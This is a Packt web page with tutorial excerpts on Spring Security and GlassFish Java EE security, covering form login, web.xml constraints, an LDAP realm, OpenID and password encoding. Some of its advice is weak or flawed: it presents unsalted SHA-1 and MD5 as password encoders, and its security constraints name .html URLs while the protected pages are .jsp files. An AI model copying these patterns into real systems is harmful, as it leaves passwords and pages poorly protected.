set will no longer be valid. Make sure that you provide appropriate messaging to users if you allow them to change these bits of their account.   Configuration of remember me session cookies Tip: If token-validity-seconds is set to -1, the login cookie will be set to a session cookie, which does not persist after the user closes their browser. The token will be valid (assuming the user doesn't close their browser) for a non-configurable length of 2 weeks. Don't confuse this with the cookie that stores your user's session ID—they're two different things with similar names!   Checking Full Authentication without Expressions Tip: If your application does not use SpEL expressions for access declarations, you can still check if the user is fully authenticated by using the IS_ AUTHENTICATED_FULLY access rule (For example, .access="IS_AUTHENTICATED_FULLY"). Be aware, however, that standard role access declarations aren't as expressive as SpEL ones, so you will have trouble handling complex boolean expressions.   Debugging remember me cookies Tip: There are two difficulties when attempting to debug issues with remember me cookies. The first is getting the cookie value at all! Spring Security doesn't offer any log level that will log the cookie value that was set. We'd suggest a browser-based tool such as Chris Pederick's Web Developer plug-in (http://chrispederick.com/work/web-developer/) for Mozilla Firefox. Browser-based development tools typically allow selective examination (and even editing) of cookie values. The second (admittedly minor) difficulty is decoding the cookie value. You can feed the cookie value into an online or offline Base64 decoder (remember to add a trailing = sign to make it a valid Base64-encoded string!)   Making effective use of an in-memory UserDetailsService Tip: A very common scenario for the use of an in-memory UserDetailsService and hard-coded user lists is the authoring of unit tests for secured components. Unit test authors often code or configure the minimal context to test the functionality of the component under test. Using an in-memory UserDetailsService with a well-defined set of users and GrantedAuthority values provides the test author with an easily controlled test environment.   Storing sensitive information Tip: Many guidelines that apply to storage of passwords apply equally to other types of sensitive information, including social security numbers and credit card information (although, depending on the application, some of these may require the ability to decrypt). It's quite common for databases storing this type of information to represent it in multiple ways, for example, a customer's full 16-digit credit card number would be stored in a highly encrypted form, but the last four digits might be stored in cleartext (for reference, think of any internet commerce site that displays XXXX XXXX XXXX 1234 to help you identify your stored credit cards).   Annotations at the class level Tip: Be aware that the method-level security annotations can also be applied at the class level as well! Method-level annotations, if supplied, will always override annotations specified at the class level. This can be helpful if your business needs dictate specification of security policies for an entire class at a time. Take care to use this functionality in conjunction with good comments and coding standards, so that developers are very clear about the security characteristics of a class and its methods.   Authenticating the user against LDAP Tip: Do not make the very common mistake of configuring an <authentication-provider> with a user-details-service-ref referring to an LdapUserDetailsService, if you are intending to authenticate the user against LDAP itself!   Externalize URLs and environment-dependent settings Tip: Coding URLs into Spring configuration files is a bad idea. Typically, storage and consistent reference to URLs is pulled out into a separate properties file, with placeholders consistent with the Spring PropertyPlaceholderConfigurer. This allows for reconfiguration of environment-specific settings via externalizable properties files without touching the Spring configuration files, and is generally considered good practice. Summary In this article we took a look at some of the tips and tricks for Spring Security. Further resources on this subject: Spring Security 3 [Book] Migration to Spring Security 3 [Article] Opening up to OpenID with Spring Security [Article] Spring Security: Configuring Secure Passwords [Article]
Read more
  • 0
  • 0
  • 2726

article-image-developing-secure-java-ee-applications-glassfish
Packt
31 May 2010
14 min read
Save for later

Developing Secure Java EE Applications in GlassFish

Packt
31 May 2010
14 min read
In this article series, we will develop a secure Java EE application based on Java EE and GlassFish capabilities. In course of the article, we will cover following topics: Analyzing Java EE application security requirements Including security requirements in Java EE application design Developing secure Business layer using EJBs Developing secure Presentation layer using JSP and Servlets Configuring deployment descriptors of Java EE applications Specifying security realm for enterprise applications Developing secure application client module Configuring Application Client Container Read Designing Secure Java EE Applications in GlassFish here. Developing the Presentation layer The Presentation layer is the closest layer to end users when we are developing applications that are meant to be used by humans instead of other applications. In our application, the Presentation layer is a Java EE web application consisting of the elements listed in the following table. In the table you can see that different JSP files are categorized into different directories to make the security description easier. Element Name Element Description Index.jsp Application entry point. It has some links to functional JSP pages like toMilli.jsp and so on. auth/login.html This file presents a custom login page to user when they try to access a restricted resource. This file is placed inside auth directory of the web application. auth/logout.jsp Logging users out of the system after their work is finished. auth/loginError.html Unsuccessful login attempt redirect users to this page. This file is placed inside auth directory of the web application jsp/toInch.jsp Converts given length to inch, it is only available for managers. jsp/toMilli.jsp Converts given length to millimeter, this page is available to any employee. jsp/toCenti.jsp Converts given length to centimeter, this functionality is available for everyone. Converter Servlet Receives the request and invoke the session bean to perform the conversion and returns back the value to user. auth/accessRestricted.html An error page for error 401 which happens when authorization fails. Deployment Descriptors The deployment descriptors which we describe the security constraints over resources we want to protect. Now that our application building blocks are identified we can start implementing them to complete the application. Before anything else let's implement JSP files that provides the conversion GUI. The directory layout and content of the Web module is shown in the following figure: Implementing the Conversion GUI In our application we have an index.jsp file that acts as a gateway to the entire system and is shown in the following listing: <html> <head><title>Select A conversion</title></head> <body><h1>Select A conversion</h1> <a href="auth/login.html">Login</a> <br/> <a href="jsp/toCenti.jsp">Convert Meter to Centimeter</a> <br/> <a href="jsp/toInch.jsp">Convert Meter to Inch</a> <br/> <a href="jsp/toMilli.jsp">Convert to Millimeter</a><br/> <a href="auth/logout.jsp">Logout</a> </body> </html> Implementing the Converter servlet The Converter servlet receives the conversion value and method from JSP files and calls the corresponding method of a session bean to perform the actual conversion. The following listing shows the Converter servlet content: @WebServlet(name="Converter", urlPatterns={"/Converter"}) public class Converter extends HttpServlet { @EJB private ConversionLocal conversionBean; protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { } @Override protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { System.out.println("POST"); response.setContentType("text/html;charset=UTF-8"); PrintWriter out = response.getWriter(); try{ int valueToconvert = Integer.parseInt(request.getParameter("meterValue")); String method = request.getParameter("method"); out.print("<hr/> <center><h2>Conversion Result is: "); if (method.equalsIgnoreCase("toMilli")) { out.print(conversionBean.toMilimeter(valueToconvert)); } else if (method.equalsIgnoreCase("toCenti")) { out.print(conversionBean.toCentimeter(valueToconvert)); } else if (method.equalsIgnoreCase("toInch")) { out.print(conversionBean.toInch(valueToconvert)); } out.print("</h2></center>"); }catch (AccessLocalException ale) { response.sendError(401); }finally { out.close(); } } } Starting from the beginning we are using annotation to configure the servlet mapping and servlet name instead of using the deployment descriptor for it. Then we use dependency injection to inject an instance of Conversion session bean into the servlet and decide which one of its methods we should invoke based on the conversion type that the caller JSP sends as a parameter. Finally, we catch javax.ejb.AccessLocalException and send an HTTP 401 error back to inform the client that it does not have the required privileges to perform the requested action. The following figure shows what the result of invocation could look like: Each servlet needs some description elements in the deployment descriptor or included as deployment descriptor elements. Implementing the conversion JSP files is the last step in implementing the functional pieces. In the following listing you can see content of the toMilli.jsp file. <html> <head><title>Convert To Millimeter</title></head> <body><h1>Convert To Millimeter</h1> <form method=POST action="../Converter">Enter Value to Convert: <input name=meterValue> <input type="hidden" name="method" value="toMilli"> <input type="submit" value="Submit" /> </form> </body> </html> The toCenti.jsp and toInch.jsp files look the same except for the descriptive content and the value of the hidden parameter which will be toCenti and toInch respectively for toCenti.jsp and toInch.jsp. Now we are finished with the functional parts of the Web layer; we just need to implement the required GUI for security measures. Implementing the authentication frontend For the authentication, we should use a custom login page to have a unified look and feel in the entire web frontend of our application. We can use a custom login page with the FORM authentication method. To implement the FORM authentication method we need to implement a login page and an error page to redirect the users to that page in case authentication fails. Implementing authentication requires us to go through the following steps: Implementing login.html and loginError.html Including security description in the web.xml and sun-web.xml or sun-application.xml Implementing a login page In FORM authentication we implement our own login form to collect username and password and we then pass them to the container for authentication. We should let the container know which field is username and which field is password by using standard names for these fields. The username field is j_username and the password field is j_password. To pass these fields to container for authentication we should use j_security_check as the form action. When we are posting to j_security_check the servlet container takes action and authenticates the included j_username and j_password against the configured realm. The listing below shows login.html content. <form method="POST" action="j_security_check"> Username: <input type="text" name="j_username"><br /> Password: <input type="password" name="j_password"><br /> <br /> <input type="submit" value="Login"> <input type="reset" value="Reset"> </form> The following figure shows the login page which is shown when an unauthenticated user tries to access a restricted resource: Implementing a logout page A user may need to log out of our system after they're finished using it. So we need to implement a logout page. The following listing shows the logout.jsp file: <% session.invalidate(); %> <body> <center> <h1>Logout</h1> You have successfully logged out. </center> </body> Implementing a login error page And now we should implement LoginError.html, an authentication error page to inform user about its authentication failure. <html> <body> <h2>A Login Error Occurred</h2> Please click <a href="login.html">here</a> for another try. </body> </html> Implementing an access restricted page When an authenticated user with no required privileges tries to invoke a session bean method, the EJB container throws a javax.ejb.AccessLocalException. To show a meaningful error page to our users we should either map this exception to an error page or we should catch the exception, log the event for audition purposes, and then use the sendError() method of the HttpServletResponse object to send out an error code. We will map the HTTP error code to our custom web pages with meaningful descriptions using the web.xml deployment descriptor. You will see which configuration elements we will use to do the mapping. The following snippet shows AccessRestricted.html file: <body> <center> <p>You need to login to access the requested resource. To login go to <a href="auth/login.html">Login Page</a></p></center> </body> Configuring deployment descriptors So far we have implemented required files for the FORM-based authentication and we only need to include required descriptions in the web.xml file. Looking back at the application requirement definitions, we see that anyone can use meter to centimeter conversion functionality and any other functionality that requires the user to login. We use three different HTML pages for different types of conversion. We do not need any constraint on toCentimeter.html therefore we do not need to include any definition for it. Per application description, any employee can access the toMilli.jsp page. Defining security constraint for this page is shown in the following listing: <security-constraint> <display-name>You should be an employee</display-name> <web-resource-collection> <web-resource-name>all</web-resource-name> <description/> <url-pattern>/jsp/toMillimeter.html</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> <http-method>DELETE</http-method> </web-resource-collection> <auth-constraint> <description/> <role-name>employee_role</role-name> </auth-constraint> </security-constraint> We should put enough constraints on the toInch.jsp page so that only managers can access the page. The listing included below shows the security constraint definition for this page. <security-constraint> <display-name>You should be a manager</display-name> <web-resource-collection> <web-resource-name>Inch</web-resource-name> <description/> <url-pattern>/jsp/toInch.html</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> <auth-constraint> <description/> <role-name>manager_role</role-name> </auth-constraint> </security-constraint> Finally we need to define any role we used in the deployment descriptor. The following snippet shows how we define these roles in the web.xml page. <security-role> <description/> <role-name>manager_role</role-name> </security-role> <security-role> <description/> <role-name>employee_role</role-name> </security-role> Looking back at the application requirements, we need to define data constraint and ensure that username and passwords provided by our users are safe during transmission. The following listing shows how we can define the data constraint on the login.html page. <security-constraint> <display-name>Login page Protection</display-name> <web-resource-collection> <web-resource-name>Authentication</web-resource-name> <description/> <url-pattern>/auth/login.html</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> <user-data-constraint> <description/> <transport-guarantee>CONFIDENTIAL</transport-guarantee> </user-data-constraint> </security-constraint> One more step and our web.xml file will be complete. In this step we define an error page for HTML 401 error code. This error code means that application server is unable to perform the requested action due to negative authorization result. The following snippet shows the required elements to define this error page. <error-page> <error-code>401</error-code> <location>AccessRestricted.html</location> </error-page> Now that we are finished with declaring the security we can create the conversion pages and after creating these pages we can start with Business layer and its security requirements. Specifying the security realm Up to this point we have defined all the constraints that our application requires but we still need to follow one more step to complete the application's security configuration. The last step is specifying the security realm and authentication. We should specify the FORM authentication and per-application description; authentication must happen against the company-wide LDAP server. Here we are going to use the LDAP security realm LDAPRealm. We need to import a new LDIF file into our LDAP server, which contains groups and users definition required for this article. To import the file we can use the following command, assuming that you downloaded the source code bundle from https://www.packtpub.com//sites/default/files/downloads/9386_Code.zip and you have it extracted. import-ldif --ldifFile path/to/chapter03/users.ldif --backendID userRoot --clearBackend --hostname 127.0.0.1 --port 4444 --bindDN cn=gf cn=admin --bindPassword admin --trustAll --noPropertiesFile The following table show users and groups that are defined inside the users.ldif file. Username and password Group membership james/james manager, employee meera/meera employee We used OpenDS for the realm data storage and it had two users, one in the employee group and the other one in the manager group. To configure the authentication realm we need to include the following snippet in the web.xml file. <login-config> <auth-method>FORM</auth-method> <realm-name>LDAPRealm</realm-name> <form-login-config> <form-login-page>/auth/login.html</form-login-page> <form-error-page>/auth/loginError.html</form-error-page> </form-login-config> </login-config> If we look at our Web and EJB modules as separate modules we must specify the role mappings for each module separately using the GlassFish deployment descriptors, which are sun-web.xml and sun-ejb.xml. But we are going to bundle our modules as an Enterprise Application Archive (EAR) file so we can use the GlassFish deployment descriptor for enterprise applications to define the role mapping in one place and let all modules use that definitions. The following listing shows roles and groups mapping in the sun-application.xml file. <sun-application> <security-role-mapping> <role-name>manager_role</role-name> <group-name>manager</group-name> </security-role-mapping> <security-role-mapping> <role-name>employee_role</role-name> <group-name>employee</group-name> </security-role-mapping> <realm>LDAPRealm</realm> </sun-application> The security-role-mapping element we used in sun-application.xml has the same schema as the security-role-mapping element of the sun-web.xml and sun-ejb-jar.xml files. You should have noticed that we have a realm element in addition to role mapping elements. We can use the realm element of the sun-application.xml to specify the default authentication realm for the entire application instead of specifying it for each module separately. Summary In this article series, we covered the following topics: Analyzing Java EE application security requirements Including security requirements in Java EE application design Developing secure Business layer using EJBs Developing secure Presentation layer using JSP and Servlets Configuring deployment descriptors of Java EE applications Specifying security realm for enterprise applications Developing secure application client module Configuring Application Client Container We learnt how to develop a secure Java EE application with all standard modules including Web, EJB, and application client modules.
Read more
  • 0
  • 0
  • 2651
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $15.99/month. Cancel anytime
article-image-designing-secure-java-ee-applications-glassfish
Packt
31 May 2010
2 min read
Save for later

Designing Secure Java EE Applications in GlassFish

Packt
31 May 2010
2 min read
Security is an orthogonal concern for an application and we should assess it right from the start by reviewing the analysis we receive from business and functional analysts. Assessing the security requirements results in understanding the functionalities we need to include in our architecture to deliver a secure application covering the necessary requirements. Security necessities can include a wide area of requirements, which may vary from a simple authentication to several sub-systems. A list of these sub-systems includes identity and access management system and transport security, which can include encrypting data as well. In this article series, we will develop a secure Java EE application based on Java EE and GlassFish capabilities. In course of the article, we will cover the following topics: Analyzing Java EE application security requirements Including security requirements in Java EE application design Developing secure Business layer using EJBs Developing secure Presentation layer using JSP and Servlets Configuring deployment descriptors of Java EE applications Specifying security realm for enterprise applications Developing secure application client module Configuring Application Client Container Developing Secure Java EE Applications in GlassFish is the second part of this article series. Understanding the sample application The sample application that we are going to develop, converts different length measurement units into each other. Our application converts meter to centimeter, millimeter, and inch. The application also stores usage statistics for later use cases. Guest users who prefer not to log in can only use meter to centimeter conversion, while any company employee can use meter to centimeter and meter to millimeter conversion, and finally any of company's managers can access meter to inch in addition to two other conversion functionalities. We should show a custom login page to comply with site-wide look and feel. No encryption is required for communication between clients and our application but we need to make sure that no one can intercept and steal the username and passwords provided by members. All members' identification information is stored in the company's wide directory server. The following diagram shows the high-level functionality of the sample application: We have login action and three conversion actions. Users can access some of them after logging in and some of them can be accessed without logging in.
Read more
  • 0
  • 0
  • 1987

article-image-opening-openid-spring-security
Packt
27 May 2010
7 min read
Save for later

Opening up to OpenID with Spring Security

Packt
27 May 2010
7 min read
(For more resources on Spring, see here.) The promising world of OpenID The promise of OpenID as a technology is to allow users on the web to centralize their personal data and information with a trusted provider, and then use the trusted provider as a delegate to establish trustworthiness with other sites with whom the user wants to interact. In concept, this type of login through a trusted third party has been in existence for a long time, in many different forms (Microsoft Passport, for example, became one of the more notable central login services on the web for some time). OpenID's distinct advantage is that the OpenID Provider needs to implement only the public OpenID protocol to be compatible with any site seeking to integrate login with OpenID. The OpenID specification itself is an open specification, which leads to the fact that there is currently a diverse population of public providers up and running the same protocol. This is an excellent recipe for healthy competition and it is good for consumer choice. The following diagram illustrates the high-level relationship between a site integrating OpenID during the login process and OpenID providers. We can see that the user presents his credentials in the form of a unique named identifier, typically a Uniform Resource Identifier (URI), which is assigned to the user by their OpenID provider, and is used to uniquely identify both the user and the OpenID provider. This is commonly done by either prepending a subdomain to the URI of the OpenID provider (for example, https://jamesgosling.myopenid.com/), or appending a unique identifier to the URI of the OpenID provider URI (for example, https://me.yahoo.com/jamesgosling). We can visually see from the presented URI that both methods clearly identify both the OpenID provider(via domain name) and the unique user identifier. Don't trust OpenID unequivocally! You can see here a fundamental assumption that can fool users of the system. It is possible for us to sign up for an OpenID, which would make it appear as though we were James Gosling, even though we obviously are not. Do not make the false assumption that just because a user has a convincing-sounding OpenID (or OpenID delegate provider) they are the authentic person, without requiring additional forms of identification. Thinking about it another way, if someone came to your door just claiming he was James Gosling, would you let him in without verifying his ID? The OpenID-enabled application then redirects the user to the OpenID provider, at which the user presents his credentials to the provider, which is then responsible for making an access decision. Once the access decision has been made by the provider, the provider redirects the user to the originating site, which is now assured of the user's authenticity. OpenID is much easier to understand once you have tried it. Let's add OpenID to the JBCP Pets login screen now! Signing up for an OpenID In order to get the full value of exercises in this section (and to be able to test login), you'll need your own OpenID from one of the many available providers, of which a partial listing is available at http://openid.net/get-an-openid/. Common OpenID providers with which you probably already have an account are Yahoo!, AOL, Flickr, or MySpace. Google's OpenID support is slightly different, as we'll see later in this article when we add Sign In with Google support to our login page. To get full value out of the exercises in this article, we recommend you have accounts with at least: myOpenID Google Enabling OpenID authentication with Spring Security Spring Security provides convenient wrappers around provider integrations that are actually developed outside the Spring ecosystem. In this vein, the openid4java project ( http://code.google.com/p/openid4java/) provides the underlying OpenID provider discovery and request/response negotiation for the Spring Security OpenID functionality. Writing an OpenID login form It's typically the case that a site will present both standard (username and password) and OpenID login options on a single login page, allowing the user to select from one or the other option, as we can see in the JBCP Pets target login page. The code for the OpenID-based form is as follows: <h1>Or, Log Into Your Account with OpenID</h1> <p> Please use the form below to log into your account with OpenID. </p> <form action="j_spring_openid_security_check" method="post"> <label for="openid_identifier">Login</label>: <input id="openid_identifier" name="openid_identifier" size="20" maxlength="100" type="text"/> <img src="images/openid.png" alt="OpenID"/> <br /> <input type="submit" value="Login"/> </form> The name of the form field, openid_identifier, is not a coincidence. The OpenID specification recommends that implementing websites use this name for their OpenID login field, so that user agents (browsers) have the semantic knowledge of the function of this field. There are even browser plug-ins such as Verisign's OpenID SeatBelt ( https://pip.verisignlabs.com/seatbelt.do), which take advantage of this knowledge to pre-populate your OpenID credentials into any recognizable OpenID field on a page. You'll note that we don't offer the remember me option with OpenID login. This is due to the fact that the redirection to and from the vendor causes the remember me checkbox value to be lost, such that when the user's successfully authenticated, they no longer have the remember me option indicated. This is unfortunate, but ultimately increases the security of OpenID as a login mechanism for our site, as OpenID forces the user to establish a trust relationship through the provider with each and every login. Configuring OpenID support in Spring Security Turning on basic OpenID support, via the inclusion of a servlet filter and authentication provider, is as simple as adding a directive to our <http> configuration element in dogstore-security.xml as follows:/   <http auto-config="true" ...> <!-- Omitting content... --> <openid-login/> </http> After adding this configuration element and restarting the application, you will be able to use the OpenID login form to present an OpenID and navigate through the OpenID authentication process. When you are returned to JBCP Pets, however, you will be denied access. This is because your credentials won’t have any roles assigned to them. We’ll take care of this next. Adding OpenID users As we do not yet have OpenID-enabled new user registration, we'll need to manually insert the user account (that we'll be testing) into the database, by adding them to test-users-groups-data.sql in our database bootstrap code. We recommend that you use myOpenID for this step (notably, you will have trouble with Yahoo!, for reasons we'll explain in a moment). If we assume that our OpenID is https://jamesgosling.myopenid.com/, then the SQL that we'd insert in this file is as follows: insert into users(username, password, enabled, salt) values ('https:// jamesgosling.myopenid.com/','unused',true,CAST(RAND()*1000000000 AS varchar)); insert into group_members(group_id, username) select id,'https:// jamesgosling.myopenid.com/' from groups where group_ name='Administrators'; You'll note that this is similar to the other data that we inserted for our traditional username-and password-based admin account, with the exception that we have the value unused for the password. We do this, of course, because OpenID-based login doesn't require that our site should store a password on behalf of the user! The observant reader will note, however, that this does not allow a user to create an arbitrary username and password, and associate it with an OpenID—we describe this process briefly later in this article, and you are welcome to explore how to do this as an advanced application of this technology. At this point, you should be able to complete a full login using OpenID. The sequence of redirects is illustrated with arrows in the following screenshot: We've now OpenID-enabled JBCP Pets login! Feel free to test using several OpenID providers. You'll notice that, although the overall functionality is the same, the experience that the provider offers when reviewing and accepting the OpenID request differs greatly from provider to provider.
Read more
  • 0
  • 2
  • 16103

article-image-spring-security-configuring-secure-passwords
Packt
24 May 2010
6 min read
Save for later

Encode your password with Spring Security 3

Packt
24 May 2010
6 min read
This article by Peter Mularien is an excerpt from the book Spring Security 3. In this article, we will: Examine different methods of configuring password encoding Understand the password salting technique of providing additional security to stored passwords (For more resources on Spring, see here.) In any secured system, password security is a critical aspect of trust and authoritativeness of an authenticated principal. Designers of a fully secured system must ensure that passwords are stored in a way in which malicious users would have an impractically difficult time compromising them. The following general rules should be applied to passwords stored in a database: Passwords must not be stored in cleartext (plain text) Passwords supplied by the user must be compared to recorded passwords in the database A user's password should not be supplied to the user upon demand (even if the user forgets it) For the purposes of most applications, the best fit for these requirements involves one-way encoding or encryption of passwords as well as some type of randomization of the encrypted passwords. One-way encoding provides the security and uniqueness properties that are important to properly authenticate users with the added bonus that once encrypted, the password cannot be decrypted. In most secure application designs, it is neither required nor desirable to ever retrieve the user's actual password upon request, as providing the user's password to them without proper additional credentials could present a major security risk. Most applications instead provide the user the ability to reset their password, either by presenting additional credentials (such as their social security number, date of birth, tax ID, or other personal information), or through an email-based system. Storing other types of sensitive information Many of the guidelines listed that apply to passwords apply equally to other types of sensitive information, including social security numbers and credit card information (although, depending on the application, some of these may require the ability to decrypt). It's quite common for databases storing this type of information to represent it in multiple ways, for example, a customer's full 16-digit credit card number would be stored in a highly encrypted form, but the last four digits might be stored in cleartext (for reference, think of any internet commerce site that displays XXXX XXXX XXXX 1234 to help you identify your stored credit cards). You may already be thinking ahead and wondering, given our (admittedly unrealistic) approach of using SQL to populate our HSQL database with users, how do we encode the passwords? HSQL, or most other databases for that matter, don't offer encryption methods as built-in database functions. Typically, the bootstrap process (populating a system with initial users and data) is handled through some combination of SQL loads and Java code. Depending on the complexity of your application, this process can get very complicated. For the JBCP Pets application, we'll retain the embedded-database declaration and the corresponding SQL, and then add a small bit of Java to fire after the initial load to encrypt all the passwords in the database. For password encryption to work properly, two actors must use password encryption in synchronization ensuring that the passwords are treated and validated consistently. Password encryption in Spring Security is encapsulated and defined by implementations of the o.s.s.authentication.encoding.PasswordEncoder interface. Simple configuration of a password encoder is possible through the <password-encoder> declaration within the <authentication-provider> element as follows: <authentication-manager alias="authenticationManager"> <authentication-provider user-service-ref="jdbcUserService"> <password-encoder hash="sha"/> </authentication-provider></authentication-manager> You'll be happy to learn that Spring Security ships with a number of implementations of PasswordEncoder, which are applicable for different needs and security requirements. The implementation used can be specified using the hash attribute of the <password-encoder> declaration. The following table provides a list of the out of the box implementation classes and their benefits. Note that all implementations reside in the o.s.s.authentication. encoding package. Implementation class Description hash value PlaintextPasswordEncoder Encodes the password as plaintext. Default DaoAuthenticationProvider password encoder. plaintext Md4PasswordEncoder PasswordEncoder utilizing the MD4 hash algorithm. MD4 is not a secure algorithm-use of this encoder is not recommended. md4 Md5PasswordEncoder PasswordEncoder utilizing the MD5 one-way encoding algorithm. md5 ShaPasswordEncoder PasswordEncoder utilizing the SHA one-way encoding algorithm. This encoder can support confi gurable levels of encoding strength. Sha   sha-256 LdapShaPasswordEncoder Implementation of LDAP SHA and LDAP SSHA algorithms used in integration with LDAP authentication stores. {sha}   {ssha}   As with many other areas of Spring Security, it's also possible to reference a bean definition implementing PasswordEncoder to provide more precise configuration and allow the PasswordEncoder to be wired into other beans through dependency injection. For JBCP Pets, we'll need to use this bean reference method in order to encode the bootstrapped user data. Let's walk through the process of configuring basic password encoding for the JBCP Pets application. Configuring password encoding Configuring basic password encoding involves two pieces—encrypting the passwords we load into the database after the SQL script executes, and ensuring that the DaoAuthenticationProvider is configured to work with a PasswordEncoder. Configuring the PasswordEncoder First, we'll declare an instance of a PasswordEncoder as a normal Spring bean: <bean class="org.springframework.security.authentication. encoding.ShaPasswordEncoder" id="passwordEncoder"/> You'll note that we're using the SHA-1 PasswordEncoder implementation. This is an efficient one-way encryption algorithm, commonly used for password storage. Configuring the AuthenticationProvider We'll need to configure the DaoAuthenticationProvider to have a reference to the PasswordEncoder, so that it can encode and compare the presented password during user login. Simply add a <password-encoder> declaration and refer to the bean ID we defined in the previous step: <authentication-manager alias="authenticationManager"> <authentication-provider user-service-ref="jdbcUserService"> <password-encoder ref="passwordEncoder"/> </authentication-provider></authentication-manager> Try to start the application at this point, and then try to log in. You'll notice that what were previously valid login credentials are now being rejected. This is because the passwords stored in the database (loaded with the bootstrap test-users-groupsdata. sql script) are not stored in an encrypted form that matches the password encoder. We'll need to post-process the bootstrap data with some simple Java code. Writing the database bootstrap password encoder The approach we'll take for encoding the passwords loaded via SQL is to have a Spring bean that executes an init method after the embedded-database bean is instantiated. The code for this bean, com.packtpub.springsecurity.security. DatabasePasswordSecurerBean, is fairly simple. public class DatabasePasswordSecurerBean extends JdbcDaoSupport { @Autowired private PasswordEncoder passwordEncoder; public void secureDatabase() { getJdbcTemplate().query("select username, password from users", new RowCallbackHandler(){ @Override public void processRow(ResultSet rs) throws SQLException { String username = rs.getString(1); String password = rs.getString(2); String encodedPassword = passwordEncoder.encodePassword(password, null); getJdbcTemplate().update("update users set password = ? where username = ?", encodedPassword,username); logger.debug("Updating password for username: "+username+" to: "+encodedPassword); } }); } } The code uses the Spring JdbcTemplate functionality to loop through all the users in the database and encode the password using the injected PasswordEncoder reference. Each password is updated individually.
Read more
  • 0
  • 0
  • 6899

article-image-migration-spring-security-3
Packt
21 May 2010
5 min read
Save for later

Migration to Spring Security 3

Packt
21 May 2010
5 min read
(For more resources on Spring, see here.) During the course of this article we will: Review important enhancements in Spring Security 3 Understand configuration changes required in your existing Spring Security 2 applications when moving them to Spring Security 3 Illustrate the overall movement of important classes and packages in Spring Security 3 Once you have completed the review of this article, you will be in a good position to migrate an existing application from Spring Security 2 to Spring Security 3. Migrating from Spring Security 2 You may be planning to migrate an existing application to Spring Security 3, or trying to add functionality to a Spring Security 2 application and looking for guidance. We'll try to address both of your concerns in this article. First, we'll run through the important differences between Spring Security 2 and 3—both in terms of features and configuration. Second, we'll provide some guidance in mapping configuration or class name changes. These will better enable you to translate the examples from Spring Security 3 back to Spring Security 2 (where applicable). A very important migration note is that Spring Security 3 mandates a migration to Spring Framework 3 and Java 5 (1.5) or greater. Be aware that in many cases, migrating these other components may have a greater impact on your application than the upgrade of Spring Security! Enhancements in Spring Security 3 Significant enhancements in Spring Security 3 over Spring Security 2 include the following: The addition of Spring Expression Language (SpEL) support for access declarations, both in URL patterns and method access specifications. Additional fine-grained configuration around authentication and accessing successes and failures. Enhanced capabilities of method access declaration, including annotationbased pre-and post-invocation access checks and filtering, as well as highly configurable security namespace XML declarations for custom backing bean behavior. Fine-grained management of session access and concurrency control using the security namespace. Noteworthy revisions to the ACL module, with the removal of the legacy ACL code in o.s.s.acl and some important issues with the ACL framework are addressed. Support for OpenID Attribute Exchange, and other general improvements to the robustness of OpenID. New Kerberos and SAML single sign-on support through the Spring Security Extensions project. Other more innocuous changes encompassed a general restructuring and cleaning up of the codebase and the configuration of the framework, such that the overall structure and usage makes much more sense. The authors of Spring Security have made efforts to add extensibility where none previously existed, especially in the areas of login and URL redirection. If you are already working in a Spring Security 2 environment, you may not find compelling reasons to upgrade if you aren't pushing the boundaries of the framework. However, if you have found limitations in the available extension points, code structure, or configurability of Spring Security 2, you'll welcome many of the minor changes that we discuss in detail in the remainder of this article. Changes to configuration in Spring Security 3 Many of the changes in Spring Security 3 will be visible in the security namespace style of configuration. Although this article cannot cover all of the minor changes in detail, we'll try to cover those changes that will be most likely to affect you as you move to Spring Security 3. Rearranged AuthenticationManager configuration The most obvious changes in Spring Security 3 deal with the configuration of the AuthenticationManager and any related AuthenticationProvider elements. In Spring Security 2, the AuthenticationManager and AuthenticationProvider configuration elements were completely disconnected—declaring an AuthenticationProvider didn't require any notion of an AuthenticationManager at all. <authentication-provider> <jdbc-user-service data-source-ref="dataSource" /></authentication-provider> In Spring Security 2 to declare the <authentication-manager> element as a sibling of any AuthenticationProvider. <authentication-manager alias="authManager"/><authentication-provider> <jdbc-user-service data-source-ref="dataSource"/></authentication-provider><ldap-authentication-provider server-ref="ldap://localhost:10389/"/> In Spring Security 3, all AuthenticationProvider elements must be the children of <authentication-manager> element, so this would be rewritten as follows: <authentication-manager alias="authManager"> <authentication-provider> <jdbc-user-service data-source-ref="dataSource" /> </authentication-provider> <ldap-authentication-provider server-ref= "ldap://localhost:10389/"/></authentication-manager> Of course, this means that the <authentication-manager> element is now required in any security namespace configurations. If you had defined a custom AuthenticationProvider in Spring Security 2, you would have decorated it with the <custom-authentication-provider> element as part of its bean definition. <bean id="signedRequestAuthenticationProvider" class="com.packtpub.springsecurity.security .SignedUsernamePasswordAuthenticationProvider"> <security:custom-authentication-provider/> <property name="userDetailsService" ref="userDetailsService"/><!-- ... --></bean> While moving this custom AuthenticationProvider to Spring Security 3, we would remove the decorator element and instead configure the AuthenticationProvider using the ref attribute of the <authentication-provider> element as follows: <authentication-manager alias="authenticationManager"> <authentication-provider ref= "signedRequestAuthenticationProvider"/></authentication-manager> Of course, the source code of our custom provider would change due to class relocations and renaming in Spring Security 3—look later in the article for basic guidelines, and in the code download for this article to see a detailed mapping. New configuration syntax for session management options In addition to continuing support for the session fixation and concurrency control features from prior versions of the framework, Spring Security 3 adds new configuration capabilities for customizing URLs and classes involved in session and concurrency control management. If your older application was configuring session fixation protection or concurrent session control, the configuration settings have a new home in the <session-management> directive of the <http> element. In Spring Security 2, these options would be configured as follows: <http ... session-fixation-protection="none"><!-- ... --> <concurrent-session-control exception-if-maximum-exceeded ="true" max-sessions="1"/></http> The analogous configuration in Spring Security 3 removes the session-fixation-protection attribute from the <http> element, and consolidates as follows: <http ...> <session-management session-fixation-protection="none"> <concurrency-control error-if-maximum-exceeded ="true" max-sessions="1"/> </session-management></http> You can see that the new logical organization of these options is much more sensible and leaves room for future expansion.
Read more
  • 0
  • 0
  • 3808
article-image-securing-our-applications-using-opensso-glassfish-security
Packt
12 May 2010
8 min read
Save for later

Securing our Applications using OpenSSO in GlassFish Security

Packt
12 May 2010
8 min read
